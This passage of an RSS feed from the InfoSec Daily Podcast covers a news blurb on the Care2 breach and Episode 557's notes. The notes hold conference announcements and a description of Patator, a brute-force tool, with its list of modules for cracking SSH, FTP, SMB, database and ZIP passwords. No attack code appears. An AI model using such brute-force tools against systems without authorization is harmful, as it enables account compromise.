	&#8220;We sincerely apologize for this inconvenience. Given our large membership size, we have become a significant target for spammers and hackers over the past few years, and this was the first hacking attempt that successfully breached our protective walls,&#8221; Care2 representatives wrote on the site&#8217;s blog.
	The vulnerabilities which the hackers used to penetrate the site&#8217;s defenses were immediately patched up to prevent further access, but the incident is still being investigated to determine the full extent of the breach.
	The FBI has been contacted to investigate the matter, but so far, the only clues to point to the identity of the attackers are some IP addresses from Russia. This, however, doesn&#8217;t necessarily prove that the attack was launched from there. It could be that the hackers compromised devices from this certain location.
	Since no financial information is stored in the site&#8217;s databases, the hackers may have targeted Care2 in order to obtain passwords which they can later use to gain access to other accounts, including ones that contain [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 557 &#8211; Resolutions, Patator, DiY Satellites, ZoneTransfer.me, Censorship &amp; Porn Wiki</title>
		<link>http://www.isdpodcast.com/episode-557-resolutions-patator-diy-satellites-zonetransfer-me-censorship-porn-wiki</link>
		<comments>http://www.isdpodcast.com/episode-557-resolutions-patator-diy-satellites-zonetransfer-me-censorship-porn-wiki#comments</comments>
		<pubDate>Tue, 03 Jan 2012 01:57:03 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3320</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 557 for January 2, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 557 for January 2, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9 <br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 9-13 <br class="kix-line-break" /><br />
	Where: Bristol, UK</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What are the InfoSec Daily Podcast members New Years Resolutions?</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://patator.googlecode.com/files/patator_v0.3.py"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://patator.googlecode.com/files/patator_v0.3.py</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. Basically the author got tired of using Medusa, Hydra, ncrack, metasploit auxiliary modules, nmap NSE scripts and the like because:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They either do not work or are not reliable (false negatives several times in the past)</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They are slow (not multi-threaded or not testing multiple passwords within the same TCP connection)</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They lack very useful features that are easy to code in python (eg. interactive runtime)</span></li>
</ul>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Basically you should give Patator a try once you get disappointed by Medusa, Hydra or other brute-force tools and are about to code your own small script because Patator will allow you to:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Not write the same code over and over</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Run multi-threaded</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Benefit for useful features such as the interactive runtime commands, response logging, etc.</span></li>
</ul>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Currently it supports the following modules:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ftp_login : Brute-force FTP</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ssh_login : Brute-force SSH</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">telnet_login : Brute-force Telnet</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">smtp_login : Brute-force SMTP</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">smtp_vrfy : Enumerate valid users using the SMTP VRFY command</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">http_fuzz : Brute-force HTTP/HTTPS</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">pop_passd : Brute-force poppassd (not POP3)</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ldap_login : Brute-force LDAP</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">smb_login : Brute-force SMB</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">mssql_login : Brute-force MSSQL</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">oracle_login : Brute-force Oracle</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">mysql_login : Brute-force MySQL</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">pgsql_login : Brute-force PostgreSQL</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">vnc_login : Brute-force VNC</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">dns_forward : Forward lookup subdomains</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">dns_reverse : Reverse lookup subnets</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">snmp_login : Brute-force SNMPv1/2 and SNMPv3</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">unzip_pass : Brute-force the password of encrypted ZIP files</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">keystore_pass : Brute-force the password of Java keystore files</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-557-resolutions-patator-diy-satellites-zonetransfer-me-censorship-porn-wiki/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3320/0/infosec-daily-podcast-episode-557.mp3" length="19688112" type="audio/mpeg" />
		<itunes:duration>0:00:01</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 557 for January 2, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 557 for January 2, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Social Engineering Training
	When: March 5-9 
	Where: Seattle, Washington
	When: April 9-13 
	Where: Bristol, UK
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;What are the InfoSec Daily Podcast members New Years Resolutions?

	Source: http://patator.googlecode.com/files/patator_v0.3.py
	Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. Basically the author got tired of using Medusa, Hydra, ncrack, metasploit auxiliary modules, nmap NSE scripts and the like because:

They either do not work or are not reliable (false negatives several times in the past)
They are slow (not multi-threaded or not testing multiple passwords within the same TCP connection)
They lack very useful features that are easy to code in python (eg. interactive runtime)


	Basically you should give Patator a try once you get disappointed by Medusa, Hydra or other brute-force tools and are about to code your own small script because Patator will allow you to:

Not write the same code over and over
Run multi-threaded
Benefit for useful features such as the interactive runtime commands, response logging, etc.


	Currently it supports the following modules:

ftp_login : Brute-force FTP
ssh_login : Brute-force SSH
telnet_login : Brute-force Telnet
smtp_login : Brute-force SMTP
smtp_vrfy : Enumerate valid users using the SMTP VRFY command
smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
http_fuzz : Brute-force HTTP/HTTPS
pop_passd : Brute-force poppassd (not POP3)
ldap_login : Brute-force LDAP
smb_login : Brute-force SMB
mssql_login : Brute-force MSSQL
oracle_login : Brute-force Oracle
mysql_login : Brute-force MySQL
pgsql_login : Brute-force PostgreSQL
vnc_login : Brute-force VNC
dns_forward : Forward lookup subdomains
dns_reverse : Reverse lookup subnets
snmp_login : Brute-force SNMPv1/2 and SNMPv3
unzip_pass : Brute-for[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 556 &#8211; Nuclear Option, LAPD, Hurd, Asshat Move, Apple Phishing, Geordy’s Top “6”</title>
		<link>http://www.isdpodcast.com/episode-556-nuclear-option-lapd-hurd-asshat-move-apple-phishing-geordys-top-6</link>
		<comments>http://www.isdpodcast.com/episode-556-nuclear-option-lapd-hurd-asshat-move-apple-phishing-geordys-top-6#comments</comments>
		<pubDate>Sat, 31 Dec 2011 02:04:42 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3316</guid>
